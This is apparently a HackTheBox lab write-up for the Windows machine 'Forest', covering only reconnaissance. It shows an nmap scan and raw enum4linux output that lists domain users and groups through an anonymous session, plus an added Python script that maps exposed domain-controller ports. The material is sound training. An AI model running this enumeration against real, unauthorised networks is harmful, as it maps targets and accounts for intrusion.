Forest is one of the machines currently available on the HackTheBox hacking platform, rated as easy difficulty.
In this case it is a machine running the Windows operating system.
Port scanning
As usual, we add the IP of the Forest machine, 10.10.10.161, to /etc/hosts as forest.htb and start with the nmap port scan.
# Nmap 7.70 scan initiated Sat Jan 11 20:02:43 2020 as: nmap -A -sV -p- -oA nmapinitial forest.htb
Nmap scan report for forest.htb (10.10.10.161)
Host is up (0.12s latency).
Not shown: 989 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-11 20:17:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49674/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49701/tcp open  msrpc        Microsoft Windows RPC
49913/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=1/11%Time=5E1A2BBB%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=1/11%OT=53%CT=1%CU=41431%PV=Y%DS=2%DC=T%G=Y%TM=5E1A2CD
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=106%CI=RD%II=I%TS=A)SEQ(SP=
OS:100%GCD=1%ISR=106%TI=RD%CI=RD%II=I%TS=A)SEQ(SP=FF%GCD=1%ISR=106%TS=A)SEQ
OS:(SP=100%GCD=1%ISR=106%II=I%TS=A)SEQ(SP=FD%GCD=1%ISR=105%TI=RD%TS=B)OPS(O
OS:1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST
OS:11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R
OS:=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=
OS:0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5
OS:(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O
OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=
OS:N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%
OS:CD=Z)

Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h46m51s, deviation: 4h37m11s, median: 6m48s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2020-01-11T12:20:19-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-01-11 20:20:14
|_  start_date: 2020-01-11 19:59:28

TRACEROUTE (using port 3306/tcp)
HOP RTT       ADDRESS
1   65.81 ms  10.10.14.1
2   101.20 ms forest.htb (10.10.10.161)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 11 20:15:25 2020 -- 1 IP address (1 host up) scanned in 762.20 seconds
We find a number of open ports. From the scan results we can see that there is most likely a domain controller for the domain "htb.local". Domain services such as Kerberos, LDAP, SMB and the WinRM port are open and reachable from the internet, which is a serious vulnerability.
With that in mind, we will use an enumeration tool called enum4linux to see whether we can obtain information about the users and about other existing domains.
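As an added example (not part of the original writeup), the check below turns a saved nmap port table into the exposure finding the paragraph describes: it parses the `port/proto state service version` lines, skips the NSE script continuation lines, and groups the open ports by the domain-controller role they expose, so a perimeter review can see at a glance which roles a firewall should be hiding. The sample text is a constructed subset of the scan above; the role-to-port mapping, the function names and the `likely_domain_controller` heuristic are my own and not from any tool on the page.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the nmap -sV port table shown above for forest.htb,
# deliberately including the script continuation lines that a naive parser trips over.
SAMPLE_NMAP = """\
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-11 20:17:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
49664/tcp open  msrpc        Microsoft Windows RPC
"""

# Well-known Active Directory listener ports grouped by the role they expose (my grouping).
# Classification is by port number only: nmap's service guess ("domain?", "tcpwrapped")
# is unreliable on a DC, as the scan above shows for 636/3269.
DC_ROLE_PORTS = {
    "Kerberos (KDC / kpasswd)":  {88, 464},
    "LDAP / Global Catalog":     {389, 636, 3268, 3269},
    "SMB / MSRPC":               {135, 139, 445, 593},
    "WinRM (remote management)": {5985, 5986},
    "AD Web Services":           {9389},
    "DNS":                       {53},
}

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

def parse_nmap_ports(text):
    """Return one dict per 'port/proto state service version' line.

    Header lines and NSE script output (lines starting with '|') do not match
    the pattern and are skipped.
    """
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        ports.append({"port": int(port), "proto": proto, "state": state,
                      "service": service, "version": version or ""})
    return ports

def exposed_dc_roles(ports):
    """Map each AD role to the sorted list of open ports exposing it.

    Roles with no open port are omitted, so the result doubles as the list of
    listeners a perimeter firewall or VPN boundary should be blocking.
    """
    found = defaultdict(set)
    for entry in ports:
        if entry["state"] != "open":
            continue
        for role, role_ports in DC_ROLE_PORTS.items():
            if entry["port"] in role_ports:
                found[role].add(entry["port"])
    return {role: sorted(p) for role, p in found.items()}

def likely_domain_controller(ports):
    """Heuristic: Kerberos and LDAP open on the same host means a DC, whatever nmap labels them."""
    roles = exposed_dc_roles(ports)
    return "Kerberos (KDC / kpasswd)" in roles and "LDAP / Global Catalog" in roles

if __name__ == "__main__":
    parsed = parse_nmap_ports(SAMPLE_NMAP)
    for role, open_ports in exposed_dc_roles(parsed).items():
        print(f"{role:28s} exposed on {open_ports}")
    print("Looks like a domain controller:", likely_domain_controller(parsed))
```

Run on the sample, the script reports all six roles as internet-reachable and classifies the host as a domain controller even though nmap labelled 636 and 3269 only as `tcpwrapped`; the dynamic RPC port 49664 is parsed but, correctly, assigned to no role.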
$ enum4linux -a 10.10.10.161
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jan 12 10:57:57 2020

==========================
| Target Information |
==========================
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

====================================================
| Enumerating Workgroup/Domain on 10.10.10.161 |
====================================================
[E] Can't find workgroup/domain

============================================
| Nbtstat Information for 10.10.10.161 |
============================================
Looking up status of 10.10.10.161
No reply from 10.10.10.161

=====================================
| Session Check on 10.10.10.161 |
=====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 437.
[+] Server 10.10.10.161 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 451.
[+] Got domain/workgroup name:

===========================================
| Getting domain SID for 10.10.10.161 |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 359.
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)

======================================
| OS information on 10.10.10.161 |
======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 464.
[+] Got OS info for 10.10.10.161 from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 467.
[+] Got OS info for 10.10.10.161 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

=============================
| Users on 10.10.10.161 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 866.
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00020010 Account: Administrator Name: Administrator Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1 Name: HealthMailbox-EXCH01-010 Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e Name: HealthMailbox-EXCH01-003 Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678 Name: HealthMailbox-EXCH01-005 Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e Name: HealthMailbox-EXCH01-009 Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781 Name: HealthMailbox-EXCH01-006 Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d Name: HealthMailbox-EXCH01-004 Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64 Name: HealthMailbox-EXCH01-008 Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9 Name: HealthMailbox-EXCH01-002 Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722 Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013 Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad Name: HealthMailbox-EXCH01-001 Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238 Name: HealthMailbox-EXCH01-007 Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda Name: Lucinda Berger Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark Name: Mark Brandt Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien Name: Sebastien Caron Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb Name: Microsoft Exchange Migration Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb Name: Microsoft Exchange Approval Assistant Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18 Name: Discovery Search Mailbox Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a Name: Microsoft Exchange Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb Name: E4E Encryption Store - Active Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549 Name: Microsoft Exchange Federation Mailbox Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b Name: Microsoft Exchange Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b Name: Microsoft Exchange Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 883.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

=========================================
| Share Enumeration on 10.10.10.161 |
=========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 640.
smb1cli_req_writev_submit: called for dialect[SMB3_11] server[10.10.10.161]
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
Failed to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.161

====================================================
| Password Policy Information for 10.10.10.161 |
====================================================
[E] Dependent program "polenum.py" not present. Skipping this check. Download polenum from http://labs.portcullis.co.uk/application/polenum/

==============================
| Groups on 10.10.10.161 |
==============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 542.

[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]

[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Group 'System Managed Accounts Group' (RID: 581) has member: Couldn't lookup SIDs
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Group 'Guests' (RID: 546) has member: Couldn't lookup SIDs
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Group 'Administrators' (RID: 544) has member: Couldn't lookup SIDs
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Group 'Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Group 'Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Group 'Users' (RID: 545) has member: Couldn't lookup SIDs
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Group 'IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Group 'Account Operators' (RID: 548) has member: Couldn't lookup SIDs
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 542.

[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]

[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 593.

[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]

[+] Getting domain group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Group 'Managed Availability Servers' (RID: 1120) has member: HTB\EXCH01$
Group 'Managed Availability Servers' (RID: 1120) has member: HTB\Exchange Servers
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Group 'Domain Admins' (RID: 512) has member: HTB\Administrator
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Group 'Domain Users' (RID: 513) has member: HTB\Administrator
Group 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
Group 'Domain Users' (RID: 513) has member: HTB\krbtgt
Group 'Domain Users' (RID: 513) has member: HTB\$331000-VK4ADACQNUCA
Group 'Domain Users' (RID: 513) has member: HTB\SM_2c8eef0a09b545acb
Group 'Domain Users' (RID: 513) has member: HTB\SM_ca8c2ed5bdab4dc9b
Group 'Domain Users' (RID: 513) has member: HTB\SM_75a538d3025e4db9a
Group 'Domain Users' (RID: 513) has member: HTB\SM_681f53d4942840e18
Group 'Domain Users' (RID: 513) has member: HTB\SM_1b41c9286325456bb
Group 'Domain Users' (RID: 513) has member: HTB\SM_9b69f1b9d2cc45549
Group 'Domain Users' (RID: 513) has member: HTB\SM_7c96b981967141ebb
Group 'Domain Users' (RID: 513) has member: HTB\SM_c75ee099d0a64c91b
Group 'Domain Users' (RID: 513) has member: HTB\SM_1ffab36a2f5f479cb
Group 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc3d7722
Group 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfc9daad
Group 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc0a90c9
Group 'Domain Users' (RID: 513) has member: HTB\HealthMailbox670628e
Group 'Domain Users' (RID: 513) has member: HTB\HealthMailbox968e74d
Group 'Domain Users' (RID: 513) has member: HTB\HealthMailbox6ded678
Group 'Domain Users' (RID: 513) has member: HTB\HealthMailbox83d6781
Group 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfd87238
Group 'Domain Users' (RID: 513) has member: HTB\HealthMailboxb01ac64
Group 'Domain Users' (RID: 513) has member: HTB\HealthMailbox7108a4e
Group 'Domain Users' (RID: 513) has member: HTB\HealthMailbox0659cc1
Group 'Domain Users' (RID: 513) has member: HTB\sebastien
Group 'Domain Users' (RID: 513) has member: HTB\lucinda
Group 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group 'Domain Users' (RID: 513) has member: HTB\andy
Group 'Domain Users' (RID: 513) has member: HTB\mark
Group 'Domain Users' (RID: 513) has member: HTB\santi
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Group 'Exchange Windows Permissions' (RID: 1121) has member: HTB\Exchange Trusted Subsystem
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Group 'Domain Guests' (RID: 514) has member: HTB\Guest
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
